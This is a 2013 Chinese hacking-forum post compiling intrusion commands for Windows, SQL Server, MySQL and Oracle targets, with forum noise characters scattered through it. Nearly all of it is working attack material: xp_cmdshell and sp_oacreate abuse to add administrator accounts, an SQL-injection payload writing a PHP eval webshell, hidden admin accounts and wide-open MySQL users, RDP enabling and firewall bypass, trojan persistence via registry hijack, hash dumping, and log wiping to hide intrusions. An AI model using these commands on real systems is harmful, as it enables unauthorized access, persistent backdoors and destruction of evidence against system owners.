找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 4927|回复: 0
打印 上一主题 下一主题

渗透技术大全

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-27 21:24:42 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

6 O8 ?  l2 g" d1.net user administrator /passwordreq:no
& A5 N4 |  f9 U$ h这句的意思是"administrator帐号不需要密码",如果可以成功执行的话,3389登陆时administrator的密码就可以留空,直接登陆了,然后进去后再net user administrator /passwordreq:yes恢复就可以了
; I9 Y6 `( x( S* [2 R, A2.比较巧妙的建克隆号的步骤
' b0 I, U7 E2 [0 x* m: p  B先建一个user的用户
& W6 K! R  v. ~  U# K) N) X然后导出注册表。然后在计算机管理里删掉  @+ W3 I  d8 @8 }: l- H* x# p1 Y" o
在导入,在添加为管理员组& P/ _6 Q/ g7 V: h
3.查radmin密码4 U( I3 @' s! V$ ?8 R
reg save HKEY_LOCAL_MACHINE\SYSTEM\RAdmin c:\a.reg4 L; R" {$ C$ k" ~( \+ a% C$ x
4.[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Window NT\CurrentVersion\Image File execution options]
% j9 S  }! l( k- g; C& m  w建立一个"services.exe"的项
8 F4 M! T0 n* [再在其下面建立(字符串值)
7 ]/ {+ }6 |: n) ^* U键值为mu ma的全路径
1 a% d/ ]+ s" \2 W' v0 M5.runas /user:guest cmd
# z, J+ |: T2 ?  A0 U' r测试用户权限!, |- T, g; D- c6 Q2 H9 ^
6.、 tlntadmn config sec = -ntlm    exec master.dbo.xp_cmdshell \'tlntadmn config sec = -ntlm\'--   其实是利用了tlntadmn这个命令。想要详细了解,输入/?看看吧。(这个是需要管理员权限的哦)建立相同用户通过ntml验证就不必我说了吧?9 N3 P; r1 M; G" s' o% _  w
7.入侵后漏洞修补、痕迹清理,后门置放:
$ \2 n1 J' V) Q4 N1 @基础漏洞必须修补,如SU提权,SA注入等。DBO注入可以考虑干掉xp_treelist,xp_regread自行记得web目录;你一定要记得清理痕迹~sqlserver连接使用企业管理器连接较好,使用查询分析器会留下记录,位于HKEY_CURRENT_USER\Software \Microsoft\Microsoft SQL Server\80\Tools\Client\PrefServers。删除之;IISlog的清除可不要使用AIO类的工具直接完全删除日志~可以选择logcleaner类工具只删除指定IP的访问记录,如果你能gina到管理员密码则通过登陆他清理日志并通过WYWZ进行最后的痕迹清理。话说回来手动清理会比较安全。最后留下一个无日志记录的后门。一句话后门数个,标准后门,cfm后门我一般都不会少。要修改时间的哦~还有一招比较狠滴,如果这个机器只是台普通的肉鸡,放个TXT到管理员桌面吧~提醒他你入侵了,放置了某个后门,添加了某个用户~(当然不是你真正滴重要后门~)要他清理掉。这样你有很大的可能性得以保留你的真实后门
! l: ~+ W3 c. ^$ t7 ~8.declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c
" U* k) s! A, y' o( M
" k: E) k3 Q. F& t& m$ ]for example- \( w' d2 z! B4 y) y' ]5 M
- @$ q6 T/ r' o8 [0 N
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user aptime aptime /add'
, P7 \( f6 |' S% ?
* E" [* c$ [# Q/ p6 g- M. s" H! W3 Udeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrator aptime /add'5 B3 K4 A0 g8 M' \/ ~

1 M& f4 ^$ c3 y) e2 h3 u' Q. f9:MSSQL SERVER 2005默认把xpcmdshell 给ON了' `# t# D2 I' o$ j; H8 V
如果要启用的话就必须把他加到高级用户模式" U( y/ t/ u- X2 c
可以直接在注入点那里直接注入
6 m, w' _4 ?) C, a3 D% A2 Qid=5;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--1 b! H- C+ D) ?- M
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll");--* K- P. q5 _4 V
或者$ E# L& h  {7 D. s8 u; J
sp_addextendedproc xp_cmdshell,@dllname='xplog70.dll'% Z0 Q! |7 \( C8 @5 S
来恢复cmdshell。
; o7 [5 S2 ?6 y8 w( \
' C9 I5 W9 c' c0 `3 t' t分析器% B$ u# L! N, C, A
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--6 {' j1 }( `* r+ |7 z- Z5 B
然后;dbcc addextendedproc("xp_cmdshell","xplog70.dll")
. U7 F, ?! ^! A10.xp_cmdshell新的恢复办法
9 {  r1 S* r# v! U1 u' l* |xp_cmdshell新的恢复办法
. m, b/ c/ r+ s6 M, W扩展储存过程被删除以后可以有很简单的办法恢复:! E" H& m6 U2 I, Q
删除
1 y' V" j5 k- ^! Hdrop procedure sp_addextendedproc
3 W2 y" }% ~6 a4 Gdrop procedure sp_oacreate
) V: h$ F8 S  c; x  ^2 x5 @exec sp_dropextendedproc 'xp_cmdshell'7 \# o( T- Q) C" Z. N5 d. i3 X7 s( r; J) G" R

/ H/ p# H: n2 d6 f' [恢复
. U8 R% L) M- x+ k2 V- \0 U1 j  K( pdbcc addextendedproc ("sp_oacreate","odsole70.dll")/ l/ d" Z9 V& m
dbcc addextendedproc ("xp_cmdshell","xplog70.dll")
% W1 x) Y4 l# |& ~- E  g; ^; ]2 e
" l0 ^/ ?, w" s6 C3 E这样可以直接恢复,不用去管sp_addextendedproc是不是存在
1 o; ]% O3 i1 }- t
' g+ U4 E/ W8 q/ |5 k; \! M+ \-----------------------------
+ Y+ j) _7 c% [, Q2 i2 H. z. D" e) Y
删除扩展存储过过程xp_cmdshell的语句:' E7 ]! r' _5 w% V2 \
exec sp_dropextendedproc 'xp_cmdshell'
$ d8 ]1 k& C, B
8 c+ ^1 B- `  w) G7 c恢复cmdshell的sql语句% e4 s& X9 E# U- b: s  w
exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
' D$ S" _- V7 o6 t# |( B) S4 Y: e, p

/ a, H& X* a+ Q6 b: u开启cmdshell的sql语句
% h; u, t4 V# \* o) n4 {
( W" y' n/ H. g/ |exec sp_addextendedproc xp_cmdshell ,@dllname ='xplog70.dll'
9 ^' K& L. Y# C/ {* q. u# r& q3 s8 O1 d1 t9 T9 Q& K3 _7 S
判断存储扩展是否存在7 D4 K0 c8 i: A+ [
select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'3 A: j% g+ G0 V( @3 }, q
返回结果为1就ok
1 u# r8 W+ M9 d" `  M
* |* B" ^+ X" T- M! Q8 S恢复xp_cmdshell
  B# r3 h6 k1 n7 `$ |4 Nexec master.dbo.addextendedproc 'xp_cmdshell','xplog70.dll';select count(*) from master.dbo.sysobjects where xtype='x' and name='xp_cmdshell'8 \  S) N! m$ P* Z2 F# M/ V
返回结果为1就ok
  |% Y& f: z& p5 B1 T: |# K% w1 W% U0 S" p7 F4 }
否则上传xplog7.0.dll: C' c, x# F! J" o& o& T$ a# F! L
exec master.dbo.addextendedproc 'xp_cmdshell','c:\winnt\system32\xplog70.dll'% s* `. _# A& ]5 {' ~. {5 ~
9 J6 r& W, @  o3 ^3 ?" g' p/ @+ z
堵上cmdshell的sql语句" A" ~! ?" w/ E& b9 c# H, E
sp_dropextendedproc "xp_cmdshel
. k. R% k2 K2 P& }-------------------------2 V4 N. R- ^) v/ M
清除3389的登录记录用一条系统自带的命令:
6 p+ L4 p& W: K( y" K  Preg delete "hkcu\Software\Microsoft\Terminal Server Client"  /f7 p" Z" }! o- i$ Q3 M, j
# Q$ j" h5 q( E, A9 w  F2 }
然后删除当前帐户的 My Documents 文件夹下的 Default.rdp 文件
8 ~: O# }5 O7 Q在 mysql里查看当前用户的权限
+ j  a$ {/ m+ y3 T5 ^) w/ oshow grants for  
5 S, w: m: `/ W  s( S  ^3 L5 ^" Q' G
以下语句具有和ROOT用户一样的权限。大家在拿站时应该碰到过。root用户的mysql,只可以本地连,对外拒绝连接。以下方法可以帮助你解决这个问题了,下面的语句功能是,建立一个用户为itpro 密码123 权限为和root一样。允许任意主机连接。这样你可以方便进行在本地远程操作数据库了。) z/ S$ u* H2 _6 u% d
* q, A. L0 ^4 U4 _; h

9 D* Y2 A3 V/ {2 T4 W# KCreate USER 'itpro'@'%' IDENTIFIED BY '123';& B5 D' V' O8 t" m

) I  U4 p) Y+ V% y/ TGRANT ALL PRIVILEGES ON *.* TO 'itpro'@'%' IDENTIFIED BY '123'WITH GRANT OPTION
9 C" [& L* h1 {( l& x
9 K8 u( X$ l8 Y; N4 L- HMAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
* w% y5 y3 w7 W6 B" A( s; i
2 b; c! _5 J' C6 a+ C7 P( xMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
5 J2 g6 ^# O% B$ c4 A
) o, b8 ]: b# G+ _) p9 H$ G搞完事记得删除脚印哟。
) d1 m$ M! v/ ~4 t5 P! ]) V5 [/ j. r# h
Drop USER 'itpro'@'%';
! x; m6 @, v7 _$ m
! }2 {' O& {$ f3 kDrop DATABASE IF EXISTS `itpro` ;4 V$ t9 Z% Q# d2 w% J1 t8 r& G) s! p
  h) t5 _- }5 j5 q
当前用户获取system权限
0 j1 l$ |5 @" F; Z9 qsc Create SuperCMD binPath= "cmd /K start" type= own type= interact
# ~, d8 K4 t) u% t, Isc start SuperCMD
, [7 R2 v& B+ ~- b- z1 g8 d程序代码
( \* R1 f2 P1 z& ~. \: @<SCRIPT LANGUAGE="VBScript">
* Q& r. z6 r6 t( B, ^4 l7 nset wsnetwork=CreateObject("WSCRIPT.NETWORK")& C, w. \7 \! T% R" T# \8 H
os="WinNT://"&wsnetwork.ComputerName/ @2 r" D8 _8 }1 m& K4 }
Set ob=GetObject(os)& }4 S. R0 m8 W' K
Set oe=GetObject(os&"/Administrators,group")
- w  r: U4 F( @; eSet od=ob.Create("user","nosec")) l5 m) T2 R( g! A- F' B$ z
od.SetPassword "123456abc!@#"
. _; r1 u9 F& z7 v. Vod.SetInfo$ ?9 h5 a& M# C% V+ h5 C4 j& e
Set of=GetObject(os&"/nosec",user)& L7 v8 @4 j! M3 \4 Z" R1 w) t
oe.add os&"/nosec"3 z& F& w' `0 t1 O, M8 ?
</Script>
$ i/ y. Q8 i8 t* a6 _' J0 `<script language=javascript>window.close();</script>( V" q* `0 ]! i* k3 @1 s

8 x- R  ^* m; k: v9 ^( U
9 c6 U) l1 |( ]* b+ y. E
5 S7 H) x, Z" z+ a) H) n6 m3 O/ @: I! _: J
突破验证码限制入后台拿shell
9 L' j) i! x& n/ J. n2 g& m" `程序代码
: C3 y) |' P  m6 ]9 {$ |REGEDIT4 8 l* |9 t& @0 T- P0 D  S# a0 z
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Security] * G# S" P7 j- W! `
"BlockXBM"=dword:000000003 G- q0 P) H+ W1 x7 j9 y- D" `
5 N2 M1 u$ i$ c; V3 f) ^
保存为code.reg,导入注册表,重器IE
: i6 R: N: B0 I9 V; i0 Y- C4 w- T就可以了/ W! {! r9 k  d0 U, t: t
union写马2 |6 p4 Z1 z. d5 C: N& v1 J! ]
程序代码3 F# T% t6 p: C; _
www.baidu.com/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,3,4,'<?php%20eval($_POST[cmd])?>',6+into+outfile+'D:\\wwwroot\\duizhang.php'+/*  b$ c# {2 W% W7 I4 H# y' t1 ]
9 J8 s+ ^2 v. P+ i
应用在dedecms注射漏洞上,无后台写马2 G6 U1 |( m- C$ ?5 X& R
dedecms后台,无文件管理器,没有outfile权限的时候
/ i( [8 u, ?6 v- n在插件管理-病毒扫描里
+ U: ?7 Z+ Y: y2 D写一句话进include/config_hand.php里* ]  F# [; @4 l8 L/ h7 X+ d2 M" w
程序代码
' [/ S9 M$ t4 g* n, G5 y>';?><?php @eval($_POST[cmd]);?>& T( @0 i; y% |. A+ E' T2 N8 W
5 t7 a( X- U/ t5 v  R/ L

- j# e  ^% r6 G$ s- @如上格式
; \2 V5 r! M3 c. `+ {9 d9 }/ Y( A0 |* z0 ?3 i
oracle中用低权限用户登陆后可执行如下语句查询sys等用户hash然后用cain破解
; j; @1 |' W5 J0 w$ e& _程序代码, m3 U" T5 n4 \. a/ s& ]& N
select username,password from dba_users;
) d- _- y5 Z, J! E' N: O! T6 B6 s4 h3 w

& U3 t7 ^8 [/ d' xmysql远程连接用户; R: G( I* e! _8 I* d
程序代码
+ _6 S4 T" K2 y! \$ P# K# c  l4 v8 F) M; F% z9 s
Create USER 'nosec'@'%' IDENTIFIED BY 'fuckme';: d8 y! ~3 a7 {/ u. o( y
GRANT ALL PRIVILEGES ON *.* TO 'nosec'@'%' IDENTIFIED BY 'fuckme' WITH GRANT OPTION# V, |# p' C7 a$ W9 Z7 w
MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_PER_HOUR 0
1 `1 f& s1 R; t& pMAX_UpdateS_PER_HOUR 0 MAX_USER_CONNECTIONS 0;
8 w& Y9 Y$ H' M9 ?
. U, d- h% N7 M0 }9 u
% Q0 r5 C/ @8 G8 Y
1 {9 l# ^8 `/ ]) o8 z; C+ R8 v# t; s
/ e& t, x" J3 A7 d; R* fecho y |reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0- D; V& f3 {, v/ [8 s* y
9 n0 Q3 {1 b5 t8 a
1.查询终端端口- X8 ^( M/ I  _, T$ C" z
: ~+ g* F0 C, N5 n, [2 C$ w
xp&2003:REG query HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber
" T! s& y8 {3 I8 {
! X# F, o" B1 N# f" E. _通用:regedit /e tsp.reg "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal server\Wds\rdpwd\Tds\tcp". K1 r$ k( e; U8 Y1 W  `7 S
type tsp.reg
* l6 z* s: l  d3 z( B8 r3 }( [6 P3 H8 d
2.开启XP&2003终端服务; p7 g: S' J2 D  o- L
; u; v6 A6 _. u+ a6 I9 a

, |0 r) m& u2 n4 |REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
- S8 r7 X4 T) P5 W8 n3 R4 d& n( @' h: B7 \5 |1 ~
3 Q+ P+ r3 n2 o$ e, A3 Z5 V
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
: s& P4 `0 \6 N2 O2 G! ?+ A7 x8 N6 n2 i; H& u# ^& S+ L
3.更改终端端口为20008(0x4E28)4 L4 G, n" |/ ~; X4 ^- _
$ c; f# N0 ]- D
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
8 B* q. K* c! |. W: M: }( u  g* x+ c; Y
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
( a) i; z8 W0 ]& q+ s4 ]
! l& A+ O+ P/ `+ {4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
6 M- z  i; P) Q! H
* {& Z4 ^" k6 M: sREG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabledxpsp2res.dll,-22009 /f
5 i% {+ t& A: _2 z% _& g8 a) m& s" z: D  i: ?

8 I% P: V+ w. G+ r8 Y5.开启Win2000的终端,端口为3389(需重启)$ X/ T: L$ |6 y/ l

6 f) m" A7 h8 w' R4 Z+ J, h& \. Kecho Windows Registry Editor Version 5.00 >2000.reg
( W5 ?9 ~% ]5 necho. >>2000.reg
8 [4 d; w9 @: J+ n' decho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >>2000.reg 8 B! K4 _! {, c' {- z( i8 H
echo "Enabled"="0" >>2000.reg
5 M& ^- ?; d  fecho [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >>2000.reg ) w; j8 E# N7 I
echo "ShutdownWithoutLogon"="0" >>2000.reg
; ?6 E, I  E, A; h1 O5 x8 gecho [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >>2000.reg
1 X5 m6 J- j2 g/ becho "EnableAdminTSRemote"=dword:00000001 >>2000.reg
. v" l! j8 i4 H! S% D" gecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >>2000.reg 6 q! m0 e5 Y! R& c
echo "TSEnabled"=dword:00000001 >>2000.reg
& A( _9 K4 m: O. n2 `8 mecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >>2000.reg
4 m9 V+ d+ b+ l- x# @echo "Start"=dword:00000002 >>2000.reg
  C& ~+ _" N) o, qecho [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >>2000.reg
$ E1 c- V: s' c$ @* j+ {: s2 secho "Start"=dword:00000002 >>2000.reg
) Y, O; _: L2 |' Y0 @echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >>2000.reg ! B. x) _1 U* P* Y' v* G
echo "Hotkey"="1" >>2000.reg . _0 r& e+ K0 J( I8 S/ L! m/ P6 @
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >>2000.reg
1 b- M' N- \) D6 y' B2 {0 Decho "ortNumber"=dword:00000D3D >>2000.reg ) e3 v5 w" B2 M1 ~$ k* N2 ^
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >>2000.reg
2 }1 G8 d" K1 h- P1 A/ kecho "ortNumber"=dword:00000D3D >>2000.reg
8 s% \( ~: b. {5 z, q* w$ X, v8 o; x0 b: V  [$ p5 Q/ E3 i. X8 r1 _$ O
6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启): u9 m: l0 Z/ w  B4 [

2 [* Q% W- ?4 i2 r. `@ECHO OFF & cd/d %temp% & echo [version] > restart.inf
- e8 O3 N' l' p, i3 `(set inf=InstallHinfSection DefaultInstall): S% L' n/ U9 x
echo signature=$chicago$ >> restart.inf6 {- s8 D6 H- i( E1 G3 u$ J
echo [defaultinstall] >> restart.inf% \3 H& j  M& p6 k: R6 |8 ]
rundll32 setupapi,%inf% 1 %temp%\restart.inf9 ]* _. J5 ~" p

& D* p0 k- K' ~* L9 F
4 S$ e9 u( }% U% w. d7.禁用TCP/IP端口筛选 (需重启)
: u/ y) I8 M5 K# g. x. x4 U$ p1 {1 i& C. x! T, Y
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f
& M" `( F4 b& o; j7 i8 I! A6 p& g+ A) K) L8 K% t5 y8 Q# \+ b
8.终端超出最大连接数时可用下面的命令来连接7 Z" r/ e) U. f- V! H( ^

. u6 [2 V1 z- i* g8 A! I6 Mmstsc /v:ip:3389 /console
+ Q" C# z; @7 A& G% X5 f
4 y% q4 }( p4 x( C: x$ e$ g9.调整NTFS分区权限
/ N5 c# f, ^) o
$ T! K$ f- j$ S- wcacls c: /e /t /g everyone:F (所有人对c盘都有一切权利)
0 r4 E9 G* `% w6 c- S. p; x$ `, }5 r# O  I: H/ ^: ^
cacls %systemroot%\system32\*.exe /d everyone (拒绝所有人访问system32中exe文件)9 c" h8 I' E# K+ t& Y, k

' {& }" z# S* p. c/ }3 h, S8 h8 b: M------------------------------------------------------3 \4 m  u+ s7 ]7 N' n
3389.vbs
1 A+ K- j3 ]# j" Z% \  _0 rOn Error Resume Next
+ E4 f" M; d. Qconst HKEY_LOCAL_MACHINE = &H80000002
2 `- B# Z: r) N  ]( O) |/ istrComputer = "."+ t# q& g3 l+ h9 d' @+ e. v* Z8 n+ T
Set StdOut = WScript.StdOut2 k4 t: T& N; @# Z& M
Set oreg=GetObject("winmgmts:{impersonationLevel=impersonate}!\\" &_4 z3 N! ~- E* f; U4 W) P" d
strComputer & "\root\default:StdRegProv"); Q8 x$ N0 ]1 v. [6 i
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"
2 g) z/ H$ t+ {! r2 z. f+ f9 roreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
  @/ d# Q; E5 T- ~; r( a) k/ tstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"$ Y% c/ H1 K2 w
oreg.CreateKey HKEY_LOCAL_MACHINE,strKeyPath
* `7 c) b' G0 Q" T# v4 E5 y/ HstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp") H1 M* i2 ]. ^! I* \2 B5 H
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server"- }" h: t; ]5 r
strValueName = "fDenyTSConnections"& H1 }4 m# r0 P( H" ^# s
dwValue = 02 i; [, b# }! C
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
. w8 N( t9 u2 C7 wstrKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp"8 t4 H: P! w: b/ {0 m* v
strValueName = "ortNumber"8 a/ v3 b' K& x) H
dwValue = 33891 }. s0 j0 t& M. i" c
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue$ ], ]8 g& i6 v# e  [/ |
strKeyPath = "SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp"  @" V- C4 w; p& Q- ]2 P# E- n
strValueName = "ortNumber"! q2 M0 Y  g2 f/ j. e. ?1 z
dwValue = 3389- |1 `& c2 h5 i, w( H
oreg.SetDWORDValue HKEY_LOCAL_MACHINE,strKeyPath,strValueName,dwValue
5 B- ^' i/ }0 p7 ]3 i; z3 ESet R = CreateObject("WScript.Shell")
7 W# W8 ]0 b+ l! j, sR.run("Shutdown.exe -f -r -t 0") 9 e: w, e: U" e% }

# p/ _: p$ w$ m, M$ w3 `$ }删除awgina.dll的注册表键值7 a) I7 C7 b3 `! h# z- [% ?
程序代码# I  [! |: U( }4 r: N

: ~6 _6 Y2 X; T& K9 a6 preg delete "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v GinaDLL /f
8 m9 j/ G- Y' t7 U" X8 P7 Q; Y4 u( {) \( R5 N

( c$ R0 e1 d7 O& f( t( {4 H8 S! T- s& L  x3 w
- F3 q) B. K) ]) c" \+ R
程序代码
; J$ H6 u, O$ X* o7 s, _# WHKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\NoLMHash) j) X4 [- f0 X$ c

# _, A( N# |, ~( p设置为1,关闭LM Hash& b2 o4 C4 \- j/ i

6 |0 y( r! ?$ P: S% E1 h, J) ?& P数据库安全:入侵Oracle数据库常用操作命令8 ^- w# z& d! q" E5 c- U( I* a
最近遇到一个使用了Oracle数据库的服务器,在狂学Oracle+请教高手后终于搞到了网站后台管理界面的所有用户密码。我发现Oracle操作起来真是太麻烦,为了兄弟们以后少走些弯路,我把入侵当中必需的命令整理出来。9 Z8 r& k7 l* W+ H2 g4 n3 h& v
1、su – oracle 不是必需,适合于没有DBA密码时使用,可以不用密码来进入sqlplus界面。
% a3 L# m3 |1 ~; ~8 n4 x& @8 a2、sqlplus /nolog 或sqlplus system/manager 或./sqlplus system/manager@ora9i;: ?& v/ l# }; o. Y
3、SQL>connect / as sysdba ;(as sysoper)或3 y  O" Z; n! ?* e& d: r
connect internal/oracle AS SYSDBA ;(scott/tiger)/ D0 T0 \7 }& ?% P- X; \
conn sys/change_on_install as sysdba;
- X6 _; Z" D7 j" s6 N* O7 K4、SQL>startup; 启动数据库实例. b6 R7 }0 |7 l' A5 d& D4 X4 o
5、查看当前的所有数据库: select * from v$database;
( B! L% @) e: Q1 X; s+ V: h# Mselect name from v$database;( j5 u  u- n5 z/ H  C. ~5 U; a5 V% _3 P
6、desc v$databases; 查看数据库结构字段
8 T! O( e2 w1 _" v& o7、怎样查看哪些用户拥有SYSDBA、SYSOPER权限:7 y6 B- V/ D7 r. R, G! N
SQL>select * from V_$PWFILE_USERS;
5 a4 `, w; W* M" e/ u  TShow user;查看当前数据库连接用户1 t9 S1 r0 C) l- _9 {0 F$ X
8、进入test数据库:database test;6 p) {  w9 \# j5 m% u5 f
9、查看所有的数据库实例:select * from v$instance;1 n3 q1 t3 D5 |
如:ora9i
- A8 p' ?* |  q- Q10、查看当前库的所有数据表:
7 \6 t: Z0 i0 o. wSQL> select TABLE_NAME from all_tables;
0 n2 U0 Y6 y, j- a# `5 j" K) f% |select * from all_tables;
. r* |# [! D+ {1 h8 ]1 ISQL> select table_name from all_tables where table_name like '%u%';3 M. c8 x- J3 L1 X6 u
TABLE_NAME0 f2 d; r4 n9 T/ p, A/ {9 B  m
------------------------------' A+ X2 s/ p3 a9 u3 T8 {
_default_auditing_options_+ j7 B5 i8 Y* @; d' q4 p( E8 l; I
11、查看表结构:desc all_tables;: R- \+ f, v! p7 @+ M5 u2 ]
12、显示CQI.T_BBS_XUSER的所有字段结构:
' u) Z9 {2 T# W' tdesc CQI.T_BBS_XUSER;
; L! w; a) i1 Q+ k! W! ^13、获得CQI.T_BBS_XUSER表中的记录:* D: v4 f0 T+ x
select * from CQI.T_BBS_XUSER;
$ W( C# I4 {5 G. k" K14、增加数据库用户:(test11/test)
6 _# j  n5 _  Y/ D% E6 Xcreate user test11 identified by test default tablespace users Temporary TABLESPACE Temp;# \+ Z: V4 z; D" w. d1 E& ~% [
15、用户授权:6 I1 ~* Y- C& z9 s) s5 s
grant connect,resource,dba to test11;' m! v) I: |2 |% n
grant sysdba to test11;. {! ?+ A$ {2 T
commit;
- Q2 d9 U* h8 ^$ X- U4 a* x: P16、更改数据库用户的密码:(将sys与system的密码改为test.)3 a' V+ l1 Z) ~% z) l
alter user sys indentified by test;
5 X7 V, y- b, d. ^+ S# E7 v8 ialter user system indentified by test;* I( h& M9 a  L. |

/ O$ z2 K( ]( [1 [9 y# DapplicationContext-util.xml
  M& ~, }1 j5 O' l2 a- MapplicationContext.xml7 t# Q2 U1 y$ O
struts-config.xml$ i7 q* [, D  B6 A' {5 g! n
web.xml
' l# X1 C/ k; Q$ O6 @2 gserver.xml- Z" d3 O+ _3 H+ D
tomcat-users.xml1 R3 v* k& {3 W3 I1 q
hibernate.cfg.xml9 l$ b; V' o% h5 |( c" w$ J
database_pool_config.xml
, t) t$ U& z5 x# b7 W  X0 ?9 ~' c
2 \% L; f: z4 c. O; |# M8 ]! k
  [, n' d  n4 l7 t\WEB-INF\classes\hibernate.cfg.xml 数据库连接配置
( Z$ h2 H6 p# @" j\WEB-INF\server.xml         类似http.conf+mysql.ini+php.ini
: k1 P  S# r7 r' G9 z8 e\WEB-INF\struts-config.xml  文件目录结构
% h! Y0 h1 X# ]8 U8 E; J) L4 W( |0 [- q! s
spring.properties 里边包含hibernate.cfg.xml的名称
% K& B$ f7 M. i* Q! B
- U1 D; A; O$ ^. a9 H: r
- Q! a7 U3 d# B9 U8 rC:\Program Files\Apache Software Foundation\Tomcat 5.5\conf\tomcat-users.xml9 |1 i) s! W" _
: m, Y. f' N% E. o
如果都找不到  那就看看class文件吧。。5 e+ {* N4 z4 b1 [/ g' H, ?8 c/ N$ Z

2 [2 P: ~- i4 e4 ?6 M5 D% j, S# O测试1:
' E& V" |& m1 j4 x( F4 USELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t  where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1
$ \2 `" G$ y: v
) Z- W& B! [" S' f测试2:
2 t* D+ @- {  P1 y
+ Z' _/ B" s2 t" y% Q4 qcreate table dirs(paths varchar(100),paths1 varchar(100), id int)* k' n! x7 W8 M$ x  ]) n( S
9 q& f3 i( w9 X, ?
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
1 _' Z/ ?3 S* y! w' {- V2 I) S5 K
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1
: i* j% J0 [) t/ i" V8 B0 o5 G$ ?0 z3 _; n0 m$ b. S: L/ q
查看虚拟机中的共享文件:. m' y( B2 R- o4 ]
在虚拟机中的cmd中执行" }- n, F+ S0 }. Y
\\.host\Shared Folders% T: P0 n- S/ e% z1 Z1 F9 c1 n$ V: v
! s; d9 K  e- `, w
cmdshell下找终端的技巧
. n9 y0 d+ B- v6 W找终端: / W0 c# m' s; O, `  o
第一步: Tasklist/SVC 列出所有进程,系统服务及其对应的PID值! 0 m) R/ M' f9 ^8 K2 g* [
   而终端所对应的服务名为:TermService
4 H# F" d5 F/ k0 W2 ~, N2 P7 k+ E( S第二步:用netstat -ano命令,列出所有端口对应的PID值! 1 J- Y; Z. j' s  }: N, T" k& A
   找到PID值所对应的端口
8 J" O# T% p& ]$ [( V; Q% n! v; H% \  W) ?
查询sql server 2005中的密码hash
3 t/ G* o0 J/ l- [. }3 dSELECT password_hash FROM sys.sql_logins where name='sa'
